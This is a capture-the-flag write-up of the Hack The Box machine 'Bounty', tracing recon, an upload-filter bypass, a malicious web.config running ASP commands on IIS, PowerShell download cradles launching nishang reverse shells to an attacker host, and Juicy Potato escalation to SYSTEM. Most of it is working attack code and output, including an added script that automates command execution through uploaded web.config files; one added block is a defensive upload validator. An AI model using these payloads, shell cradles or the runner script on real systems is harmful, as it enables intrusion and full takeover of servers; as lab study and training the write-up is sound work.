[HTB] Bounty — Writeup

Initial Recon

Nmap

$ nmap -Pn --open -sC -sV -p- 10.10.10.93
PORT   STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Interesting Ports to Note

Only 80/tcp answered across the full port range: Microsoft IIS 7.5 (Windows), with the TRACE method enabled. Everything that follows is web-only.

Web Directory Enumeration (dirsearch)

$ python3 dirsearch.py -u http://10.10.10.93/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e asp,aspx,txt,html | grep '200\|301\|302'
[19:28:07] 200 -  630B  - /
[19:32:48] 301 - 156B - /UploadedFiles -> http://10.10.10.93/UploadedFiles/
[19:33:50] 301 - 156B - /uploadedFiles -> http://10.10.10.93/uploadedFiles/
[19:37:56] 200 - 974B - /transfer.aspx -> /transfer.aspx

Initial Foothold

File Upload Extension Bypass

ASPX Webshell

Allowed File Extension Check

$ cat extension.txt 
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js

#!/usr/bin/python3
# checker.py: try one upload per extension in extension.txt and report which
# ones transfer.aspx accepts. Each attempt is a fresh session because the
# ASP.NET form fields (__VIEWSTATE, __EVENTVALIDATION) are read from the page
# and posted back with the file.
import requests
import sys
from bs4 import BeautifulSoup

url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"

def upload(f):
    s = requests.Session()
    r = s.get(url)
    #if r.status_code == 200:
    #    print("[INFO] Checking...{0}".format(f))
    #else:
    #    print("[ERROR] Can't connect...")
    #    sys.exit(1)
    p = BeautifulSoup(r.content, "html.parser")
    viewState = p.find(attrs = {'name' : '__VIEWSTATE'})['value']
    eventValidation = p.find(attrs = {'name' : '__EVENTVALIDATION'})['value']
    postData = {
        '__VIEWSTATE' : viewState,
        '__EVENTVALIDATION' : eventValidation,
        'btnUpload' : 'Upload'
    }
    # dummy body; only the file name matters for the extension check
    uploadedFile = {'FileUpload1' : (f, 'test')}
    r = s.post(url, files=uploadedFile, data=postData)
    return r.text

print("[INFO] Allowed Extensions:")
for i in open(filename, 'r'):
    #print(i[:-1])
    response = upload('bigb0ss.' + i[:-1])
    if "successfully" in response:
        print("[+] %s" % i.strip())

$ python3 checker.py 
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config
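The interesting result is that the filter stops php, asp, aspx and exe but lets .config through, which is the gap the rest of the write-up exploits. The following is an added example, not code from the write-up or from the Bounty application: it puts an extension denylist (an assumption that reproduces the accept/reject pattern the checker observed) next to the hardened form an upload handler like transfer.aspx should use: an extension allowlist, a magic-byte check on the content, a refusal of names IIS interprets as configuration, and a server-chosen storage name.

```python
#!/usr/bin/python3
# Added example (not the write-up's or the Bounty application's code).
# Denylist: an assumption that reproduces what checker.py observed
# (php/asp/aspx/exe/txt/html/js blocked, png/jpg/config accepted).
# Allowlist + content check: the hardened replacement.
import os
import secrets
from typing import Tuple

# Weak pattern: block what is known to be dangerous, accept everything else.
# .config is missing, so web.config (which IIS treats as code) slips through.
DENYLIST = {".php", ".php5", ".php7", ".phtml", ".txt", ".html",
            ".asp", ".aspx", ".exe", ".js"}


def denylist_check(filename: str) -> bool:
    """True if the upload would be accepted by the denylist."""
    return os.path.splitext(filename)[1].lower() not in DENYLIST


# Hardened pattern: accept only known-safe extensions, verify the file really
# starts with that format's magic bytes, refuse names IIS interprets, and
# never keep the client's name on disk.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
RESERVED = {"web.config"}   # IIS reads this from any content directory


def allowlist_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied name and file body."""
    # Strip any directory part the client sent (either separator style).
    name = os.path.basename(filename.replace("\\", "/"))
    if name.lower() in RESERVED:
        return False, "reserved IIS file name"
    root, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not root or "." in root:
        return False, "double extension not allowed"   # e.g. shell.aspx.png
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen name: the uploader never controls what lands on disk."""
    return secrets.token_hex(8) + ext.lower()


if __name__ == "__main__":
    # Constructed samples: a real-looking PNG header and an ASP snippet.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    asp = b"<% Response.write(1+2) %>"
    for fname, body in [("web.config", asp), ("cat.png", png), ("cat.png", asp),
                        ("shell.aspx.png", png), ("..\\..\\web.config", asp)]:
        print(f"{fname:20} denylist={denylist_check(fname)!s:5} "
              f"allowlist={allowlist_check(fname, body)}")
```

The denylist accepts web.config outright; the allowlist rejects it by name, rejects a .png whose bytes are ASP, and rejects a path-traversal name after stripping the directory, while a genuine PNG or JPEG still passes.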

web.config (RCE)

IIS reads a web.config from any content directory it serves, so an uploaded one is applied to /UploadedFiles/. The handler mapping below hands *.config to the classic ASP ISAPI (asp.dll), and the requestFiltering changes undo the default rules that refuse to serve .config files and the web.config segment. ASP code placed inside an XML comment is ignored by the config parser but executed by asp.dll when the file is requested.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!-- ASP code comes here
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Swapping the test block for one that runs a command through WScript.Shell (here whoami) turns the same file into command execution:

<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
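The upload and fetch cycle above is easy to script once the command is parameterized. Below is an added example, not code from the write-up: it builds a web.config that runs an arbitrary command through the same handler mapping, wraps the output in marker strings so it can be cut out of the response regardless of how the surrounding XML comment is rendered, and reuses the transfer.aspx form fields from checker.py. The trigger URL (/UploadedFiles/web.config) is an assumption based on the directory dirsearch found; the marker strings are my own choice.

```python
#!/usr/bin/python3
# Added example (not the write-up's code): web.config command runner.
# Assumptions: transfer.aspx takes the same fields as checker.py, and the
# uploaded file is served from /UploadedFiles/ (directory found by dirsearch).
import re
from typing import Optional

BASE = "http://10.10.10.93"
UPLOAD_URL = BASE + "/transfer.aspx"
TRIGGER_URL = BASE + "/UploadedFiles/web.config"   # assumed upload location

# Written around the command output so it can be found in the raw response.
START, END = "##OUT-BEGIN##", "##OUT-END##"

# Same handler mapping as the write-up: *.config is handed to classic ASP and
# the default request-filtering rules that hide .config/web.config are removed.
HANDLER = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""


def vb_escape(s: str) -> str:
    """Escape text for a VBScript double-quoted literal (a quote becomes two)."""
    return s.replace('"', '""')


def build_web_config(cmd: str) -> str:
    """Return web.config text whose XML comment carries ASP that runs cmd.

    A '--' inside the command would close the XML comment early and make IIS
    reject the whole file with a 500, so such commands are refused here.
    """
    if "--" in cmd:
        raise ValueError("command must not contain '--' (breaks the XML comment)")
    asp = (
        "<!-- ASP code comes here\n"
        "<%\n"
        'Set sh = CreateObject("WScript.Shell")\n'
        'Set p = sh.Exec("cmd /c ' + vb_escape(cmd) + '")\n'
        'Response.write("' + START + '")\n'
        "Response.write(p.StdOut.ReadAll())\n"
        'Response.write("' + END + '")\n'
        "%>\n"
        "-->\n"
    )
    return HANDLER + asp


def extract_output(body: str) -> Optional[str]:
    """Pull the command output from between the markers; None if absent."""
    m = re.search(re.escape(START) + r"(.*?)" + re.escape(END), body, re.S)
    return m.group(1).strip() if m else None


def run_cmd(session, cmd: str) -> Optional[str]:
    """Upload a fresh web.config for cmd, request it, and return the output."""
    # Imported here so the offline helpers above work without this package.
    from bs4 import BeautifulSoup

    page = BeautifulSoup(session.get(UPLOAD_URL).content, "html.parser")
    data = {
        "__VIEWSTATE": page.find(attrs={"name": "__VIEWSTATE"})["value"],
        "__EVENTVALIDATION": page.find(attrs={"name": "__EVENTVALIDATION"})["value"],
        "btnUpload": "Upload",
    }
    files = {"FileUpload1": ("web.config", build_web_config(cmd))}
    if "successfully" not in session.post(UPLOAD_URL, files=files, data=data).text:
        raise RuntimeError("upload rejected")
    return extract_output(session.get(TRIGGER_URL).text)


if __name__ == "__main__":
    import sys
    import requests

    with requests.Session() as s:
        print(run_cmd(s, " ".join(sys.argv[1:]) or "whoami"))
```

Each call uploads a new web.config, so the previous one is overwritten rather than accumulating files in /UploadedFiles/. The '--' check matters in practice: the ASP block only survives because the IIS config parser sees it as a comment, and a stray '--' in the command turns a working payload into a server error.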

web.config (Reverse Shell)

Stage nishang's Invoke-PowerShellTcp on the attacker host and append the invoking call to the end of the script, so it fires as soon as the target downloads and evaluates it:

$ cp /opt/windows/nishang/Shells/Invoke-PowerShellTcp.ps1 revShell.ps1
$ vi revShell.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.25 -Port 9001

The ASP block in web.config then becomes a PowerShell download cradle (revShell.ps1 served over HTTP from 10.10.14.25, a listener waiting on port 9001):

<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.25/revShell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

user.txt

PS C:\users\merlin\Desktop> dir -force
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs 5/30/2018 12:22 AM 282 desktop.ini
-a-h- 5/30/2018 11:32 PM 32 user.txt
PS C:\users\merlin\Desktop> more user.txt
e29a***REDACTED***4a2f

Privilege Escalation

merlin → administrator (Juicy Potato)

PS C:\users\merlin\Desktop> systeminfo
Host Name:                 BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 11/16/2020, 1:48:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,547 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,583 MB
Virtual Memory: In Use: 512 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
PS C:\users\merlin\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Juicy Potato Attack

SeImpersonatePrivilege is enabled for the account running the web shell, and the box is an unpatched Server 2008 R2 (build 6.1.7600, no hotfixes), so Juicy Potato applies. It coerces a local DCOM server (the CLSID it tests below, {4991d34b-80a1-4291-83b6-3328366b9097}, is the default BITS class) into authenticating to its own listener on the port given with -l, impersonates the resulting SYSTEM token, and launches the program given with -p.

PS C:\users\merlin\Desktop> powershell.exe -c IEX(new-object net.webclient).downloadfile('http://10.10.14.25/JuicyPotato.exe', 'C:\Users\merlin\Desktop\juicy.exe')
PS C:\users\merlin\Desktop> dir
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2020 6:01 AM 347648 juicy.exe

exploit.bat is the program Juicy Potato will launch as SYSTEM; it pulls a second nishang shell:

powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.25/revShell-juicy.ps1')

revShell-juicy.ps1 is prepared the same way as revShell.ps1, with this call appended so it connects back to a second listener:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.25 -Port 6666

PS C:\users\merlin\Desktop> powershell.exe -c IEX(new-object net.webclient).downloadfile('http://10.10.14.25/exploit.bat', 'C:\Users\merlin\Desktop\exploit.bat')
PS C:\users\merlin\Desktop> dir
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2020 6:20 AM 99 exploit.bat
-a--- 11/16/2020 6:01 AM 347648 juicy.exe
PS C:\users\merlin\desktop> ./juicy.exe -t * -p exploit.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

On the attacker side the HTTP server log confirms that the SYSTEM process fetched the script:

$ python3 -m http.server 80
10.10.10.93 - - [15/Nov/2020 23:29:57] "GET /revShell-juicy.ps1 HTTP/1.1" 200 -

root.txt

$ nc -lvnp 6666
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49198.
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 5/31/2018 12:18 AM 32 root.txt
PS C:\users\administrator\desktop> cat root.txt
c837***REDACTED***f5ea

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
